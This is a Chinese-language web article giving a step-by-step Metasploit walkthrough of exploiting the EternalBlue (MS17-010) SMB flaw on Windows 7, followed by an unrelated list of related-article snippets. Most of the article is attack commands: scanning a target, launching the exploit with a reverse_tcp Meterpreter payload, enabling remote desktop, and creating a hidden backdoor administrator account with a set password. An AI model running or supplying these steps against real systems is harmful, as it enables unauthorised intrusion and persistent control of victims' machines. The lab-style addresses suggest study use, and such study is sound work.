win7永恒之蓝

news/2024/11/9 9:52:35/

一 使用msfconsole命令开启MSF,并使用search命令搜索永恒之蓝模块

search ms17-010

 二 :使用搜索出来的第三个模块来进行探测目标是否存在永恒之蓝漏洞,并设置好以下参数进行扫描测试

>>>use auxiliary/scanner/smb/smb_ms17_010   /模块调用或者使用use 3对搜索出来的模块进行调用.

>>>set rhost 192.168.202.131   //设置目标地址

 >>>set rport 445   //设置目标端口

>>>show options   //显示要设置的选项

>>>run   //开始运行此模块

三:通过辅助模块扫描可以发现目标系统存在永恒之蓝漏洞,并开始调用漏洞利用模块按照以下参数来进行攻击

>>>Use exploit/windows/smb/ms17_010_eternalblue      //调用ms17_010漏洞利用模块
>>>Set payload windows/x64/meterpreter/reverse_tcp   //设置payload
>>>Set RHOST  受害者IP地址                            //设置攻击目标的IP地址
>>>Set LHOST  反弹payload的IP地址                     //这是反弹的IP地址,即攻击者的IP地址
>>>Exploit                                           //漏洞攻击

 步骤四:攻击成功后获取一个Meterpreter会话....使用以下命令在Meterpreter会话开启目标主机的3389端口并进入到目标Shell中创建后门账号...

1 meterpreter>run getgui -e                                                                              //开启目标机器远程桌面服务器
2 meterpreter>shell                                                                                                    //进入到目标机器的CMD环境当中
3 C:\Windows\system32>net user warsec 123admiN@ /add                //创建后门账号
4 C:\Windows\system32>net localgroup administrators warsec /add     //将后门账号添加到管理员组当中
5 >>>rdesktop 192.168.0.19                                          //远程桌面到目标机器

 


http://www.ppmy.cn/news/703794.html

相关文章

Silverlight.XNA(C#)跨平台3D游戏研发手记:(四)SLG无限自由之过场动画

最初迷恋《火纹》,便是因为战斗时的场景切换(战斗特写);《梦幻模拟战》、《高达》、《高级大战争》亦如是。特别喜欢这些电子公仔上演一幕幕华丽的战局,如果要说一款战棋类SLG的精髓在哪?毫无疑问&#xff…

永恒之蓝MS17-010

永恒之蓝MS17-010 实验概述   Ms17-010漏洞又称永恒之蓝漏洞,自从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了“明星”。在过去的五月中,这个Exploit被多款恶意软件利用。包括肆虐的WannaCryp0t,无文件的勒索…

永恒的契约

题目大意 有一个神奇的大回环,由n块石头组成。 第i块石头有一个高度ai,两块不同的石头i,j能够互相看到,则它们在环上的两条路径中有至少一条路径上除了两个端点(即i,j)路径上石头高度都不大于min(ai,aj)。 求有多少…

永恒★爱★

没有人有永恒的生命,因为有生命就意味着有死亡。没有人有永恒的朋友,只要交上新的朋友,就会失去一些老的朋友。没有永恒的敌人,有一天你会发现敌人也会像朋友一样亲密,朋友也会成为你的可怕敌人。只有爱与血缘才是永恒…

永恒的魅力

爱情具有永恒的魅力,它不仅给人带来感情上的相互满足,而且在于它总是蕴含着一种未知的深度。这种深度令人揣摩,教人思索,从而使人在不知不觉中汲取力量,感受到爱情的真正的伟大。  爱具有巨大的创造一切的力量&#…

09永恒之蓝与永恒之黑的复现

一、永恒之蓝 1.简介 2017年3月14日,微软公布SMB远程代码执行漏洞(MS17-010),又称永恒之蓝,该漏洞在 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者…

永恒之蓝补丁

国家网络与信息安全信息通报中心紧急通报:2017年5月12日20时左右, 新型“蠕虫”式勒索病毒爆发,目前已有100多个国家和地区的数万台电脑 遭该勒索病毒感染,我国部分Windows系列操作系统用户已经遭到感染。 情况紧急,…

永恒不变

项目的消息发布了,在本次CJ。 没有过多的感觉,因为没有心思去感觉。 动态加载的优化、天气系统、材质优化、64位平台支持、编辑器新功能、BUG修正…… 看起来很多吧?一点都不多,来了两位强大的同事来分担工作,其实我…